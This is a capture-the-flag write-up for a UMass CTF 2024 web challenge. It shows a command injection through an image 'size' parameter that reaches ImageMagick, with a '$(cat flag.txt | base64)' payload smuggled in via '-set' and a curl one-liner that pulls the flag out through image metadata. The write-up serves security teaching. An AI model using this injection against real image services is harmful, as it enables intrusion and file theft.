Tags: web command-injection 

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# web/Spongebobs Homepage
> Welcome to this great website about myself! Hope you enjoy ;) DIRBUSTER or any similar tools are NOT allowed.

There is a `#command-injection` in the `/assets/image` path in `size` query parameter. The size is passed on to the **convert-im6.q16** command. When I tried various command injection payloads, it resulted in an error.


During my tries, I wasn't able to escape from the current command, so I just looked for available arguments. I learned can use `-set` argument in convert-im6.q16 to set meta tags to the image. This resulted to the following payload: `200 -set Flag "$(cat flag.txt | base64)"`. Encoding in base64 is not really required for this challenge.


We can download the image rendered and view using exiftool and decode from base64


curl -s 'http://spongebob-blog.ctf.umasscybersec.org/assets/image?name=spongebob&size=200%20-set%20Flag%20%22$(cat%20flag.txt%20|%20base64)%22' | exiftool - | grep Flag | cut -d ':' -f 2 | tr -d '!' | xargs | base64 -d

flag: **UMASS{B4S1C_CMD_INJ3CTI0N}**

Original writeup (https://xeunwa.github.io/umass-ctf-2024/#webspongebobs-homepage).